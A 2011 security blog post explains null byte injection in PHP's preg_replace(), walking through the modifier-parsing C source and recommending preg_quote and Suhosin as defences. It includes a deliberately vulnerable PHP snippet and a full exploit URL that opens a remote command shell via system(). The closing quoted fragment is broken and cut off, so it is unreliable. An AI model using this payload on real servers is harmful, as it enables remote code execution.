Wednesday, June 29, 2011

Null Byte Injection in preg_replace()

While reviewing some PHP code, I came across a real-world example of a strange and undocumented feature/bug in the function preg_replace (it has been briefly mentioned in MOPS Submission 07). On certain systems, preg_replace appears to be vulnerable to null byte injection. If both the first and the second argument are derived from user input, this can lead to remote code execution.

preg_replace naturally has the ability to evaluate its second argument as PHP code if the "e" modifier is present in the pattern given as its first argument. But preg_replace is very strict about the syntax of supplied patterns. Normally there should be no way to escape from between the "/" delimiters and inject the "e" modifier when the pattern is derived from user input, as in this example:

    $pattern = '/omfglol'.$_GET['mypattern'].'/i';
    $replacement = $_GET['replacement'];
    $subject = 'omglolomglolnostop';
    echo preg_replace($pattern,$replacement,$subject);

If you try to exploit this by injecting "test/e", the resulting pattern is "/omfgloltest/e/i". The "/" that follows the "e" is not a valid modifier, so an error is thrown:

    Warning: preg_replace(): Unknown modifier '/'
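To see why the injected "/" is rejected, it helps to look at how a delimited pattern is split. The following is a simplified C sketch, loosely modelled on PHP's pattern parsing rather than copied from it: it scans from the opening delimiter to the first unescaped matching delimiter and treats everything after it as the modifier section. The helper names are hypothetical, bracket-style delimiters such as "{...}" are not handled, and the accepted modifier set is taken from the PHP 5.3 switch shown further down.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: return a pointer to the modifier section of a
   delimited pattern such as "/abc/i", or NULL if no closing delimiter
   is found. Simplified: bracket-style delimiters are not supported. */
static const char *modifier_section(const char *pattern)
{
    assert(pattern != NULL);
    char delim = pattern[0];
    if (delim == '\0')
        return NULL;            /* empty pattern, no delimiter at all */

    const char *pp = pattern + 1;
    while (*pp != '\0') {
        if (*pp == '\\' && pp[1] != '\0')
            pp++;               /* skip the backslash-escaped character */
        else if (*pp == delim)
            return pp + 1;      /* modifiers start right after it */
        pp++;
    }
    return NULL;                /* no ending delimiter found */
}

/* Hypothetical helper: return the first character of the modifier
   section that is not an accepted modifier, or '\0' if all are valid. */
static char first_unknown_modifier(const char *mods)
{
    /* Modifier letters from the PHP 5.3 switch, plus space and newline. */
    size_t ok = strspn(mods, "imsxADSUXue \n");
    return mods[ok];
}
```

For "/omfgloltest/e/i" the modifier section is "e/i", and the first unknown modifier is '/', which is exactly the character named in the warning above.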

Let's have a look at PHP's source code, specifically the current stable release, PHP 5.3.6. Lines 337 to 374 of ext/pcre/php_pcre.c contain the loop responsible for parsing the modifiers of a pattern:

    /* Parse through the options, setting appropriate flags.  Display
       a warning if we encounter an unknown modifier. */
    while (*pp != 0) {
        switch (*pp++) {
            /* Perl compatible options */
            case 'i': coptions |= PCRE_CASELESS;       break;
            case 'm': coptions |= PCRE_MULTILINE;      break;
            case 's': coptions |= PCRE_DOTALL;         break;
            case 'x': coptions |= PCRE_EXTENDED;       break;

            /* PCRE specific options */
            case 'A': coptions |= PCRE_ANCHORED;       break;
            case 'D': coptions |= PCRE_DOLLAR_ENDONLY; break;
            case 'S': do_study  = 1;                   break;
            case 'U': coptions |= PCRE_UNGREEDY;       break;
            case 'X': coptions |= PCRE_EXTRA;          break;
            case 'u': coptions |= PCRE_UTF8;
                /* In PCRE, by default, \d, \D, \s, \S, \w, and \W recognize only ASCII
                   characters, even in UTF-8 mode. However, this can be changed by setting
                   the PCRE_UCP option. */
    #ifdef PCRE_UCP
                coptions |= PCRE_UCP;
    #endif
                break;

            /* Custom preg options */
            case 'e': poptions |= PREG_REPLACE_EVAL;   break;

            case ' ':
            case '\n':
                break;

            default:
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unknown modifier '%c'", pp[-1]);
                efree(pattern);
                return NULL;
        }
    }
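On line 339, the while loop runs until it encounters a null byte. PHP strings can contain null bytes, but this loop treats the modifier section as a NUL-terminated C string. So if "test/e" is followed by a null byte, PHP stops looking for modifiers at that point and never sees the "/i" that follows.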
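The effect of that loop can be reproduced outside PHP. Below is a simplified C sketch that keeps the shape of the switch above but only records the "i" and "e" flags (every other letter is treated as unknown here); the struct and function names are hypothetical. The modifier bytes are passed as a buffer that may contain a NUL byte in the middle, just as a PHP string can.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical result type: only the two flags this example cares about. */
struct mods {
    int caseless;   /* set by 'i' (PCRE_CASELESS in PHP) */
    int eval;       /* set by 'e' (PREG_REPLACE_EVAL in PHP) */
};

/* Simplified copy of the modifier loop: walks the modifier section until
   the first NUL byte, like "while (*pp != 0)". Returns 0 on success,
   or the unknown modifier character on failure. */
static int parse_modifiers(const char *pp, struct mods *out)
{
    assert(pp != NULL && out != NULL);
    out->caseless = 0;
    out->eval = 0;

    while (*pp != 0) {
        switch (*pp++) {
        case 'i': out->caseless = 1; break;
        case 'e': out->eval = 1;     break;
        case ' ':
        case '\n': break;
        default:
            return (unsigned char)pp[-1];   /* "Unknown modifier" case */
        }
    }
    return 0;   /* bytes after a NUL are never examined */
}
```

Called on the modifier section "e/i", it returns '/', the warning case. Called on the four bytes "e", NUL, "/i" (the C literal "e\0/i"), it returns 0 with eval set and caseless unset: the loop stops at the NUL, so neither the stray "/" nor the trailing "i" is ever seen.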

To turn the PHP example at the beginning of this post into a remote command shell, one would use a URL like this:

    http://www.example.com/pregvuln.php?mypattern=||/e%00&replacement=system($_GET['cmd']);&cmd=echo%20testing123

Note: The double pipe "||" adds empty alternatives to the pattern, so "/omfglol||/e" matches the empty string and therefore matches any subject. The pattern must match something, or the replacement code won't execute.
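The "%00" in the URL is what smuggles the null byte in: PHP URL-decodes query parameters, so $_GET['mypattern'] arrives as "||/e" followed by a NUL byte. The C sketch below uses hypothetical helpers (a rough stand-in for PHP's own decoding, not its implementation) to decode the parameter and assemble the pattern with explicit lengths, as PHP's string concatenation does, to show where the NUL ends up.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes and '+' (as a space) from in into out. Returns the
   number of bytes written; the result may contain NUL bytes, so callers
   must use the returned length rather than strlen(). */
static size_t url_decode(const char *in, char *out)
{
    size_t n = 0;
    while (*in != '\0') {
        if (in[0] == '%' && hexval(in[1]) >= 0 && hexval(in[2]) >= 0) {
            out[n++] = (char)(hexval(in[1]) * 16 + hexval(in[2]));
            in += 3;
        } else if (*in == '+') {
            out[n++] = ' ';
            in++;
        } else {
            out[n++] = *in++;
        }
    }
    return n;
}

/* Equivalent of '/omfglol' . $mypattern . '/i' with explicit lengths.
   out must have room for user_len + 10 bytes. Returns the total length. */
static size_t build_pattern(const char *user, size_t user_len, char *out)
{
    assert(out != NULL);
    size_t n = 0;
    memcpy(out + n, "/omfglol", 8); n += 8;
    memcpy(out + n, user, user_len); n += user_len;
    memcpy(out + n, "/i", 2);       n += 2;
    return n;
}
```

Decoding "||/e%00" yields 5 bytes, and the assembled pattern is 15 bytes long with the NUL at offset 12. Code that stops at the first NUL therefore sees only "/omfglol||/e", even though the trailing "/i" is still physically present in the string.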

Edit: My initial tests were distorted by the Suhosin patch, which also protects the server from this type of attack.
All PHP versions, as of today, are vulnerable to this attack.


To defend against this type of attack, just follow best practice: user input should always be escaped with preg_quote before being used in a regexp pattern.

This is a secured version of the example at the beginning of this post:

    $pattern = '/omfglol'.preg_quote($_GET['mypattern'],'/').'/i';
    $replacement = $_GET['replacement'];
    $subject = 'omglolomglolnostop';
    echo preg_replace($pattern,$replacement,$subject);

Alternatively, to defend against this at the server level, install Suhosin.
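preg_quote helps because it escapes every character that could end the regex early or change its meaning, including the delimiter passed as its second argument. The C sketch below approximates that escaping; it is not PHP's implementation, and it assumes preg_quote's 5.3-era behaviour as I understand it: the listed metacharacters and the delimiter get a backslash, and a NUL byte becomes the four characters "\000" (later PHP versions also escape "#"). The function name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical approximation of preg_quote(): writes an escaped copy of
   in[0..len) to out and NUL-terminates it. out needs 4 * len + 1 bytes,
   since a single NUL byte expands to four characters. Returns the
   length of the escaped string. */
static size_t quote_like_preg_quote(const char *in, size_t len,
                                    char delim, char *out)
{
    static const char special[] = ".\\+*?[^]$(){}=!<>|:-";
    size_t n = 0;

    assert(in != NULL || len == 0);
    for (size_t i = 0; i < len; i++) {
        char c = in[i];
        if (c == '\0') {
            /* NUL becomes the octal escape \000, so no raw NUL survives */
            memcpy(out + n, "\\000", 4);
            n += 4;
        } else if (strchr(special, c) != NULL || c == delim) {
            out[n++] = '\\';    /* metacharacter or delimiter: escape it */
            out[n++] = c;
        } else {
            out[n++] = c;
        }
    }
    out[n] = '\0';
    return n;
}
```

Quoting the attack value "||/e" plus NUL with delimiter '/' gives "\|\|\/e\000", so the assembled pattern becomes "/omfglol\|\|\/e\000/i": the injected "/" is no longer a delimiter, no raw NUL remains, and the only modifier left is "i".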


    However, even if there is no “e” modifier, attackers sometimes still have the possibility to evaluate code. This can be achieved by dropping part of the regexp by putting a null byte into it. Let’s look at the same example, but slightly modified:

    (.*?)$regexp<\/tag>/", '\\1', $var);
    Maybe this example looks too naive, but the current aim is to show when a null-byte attack could work. Now consider that the vulnerable script accepts a request like this:


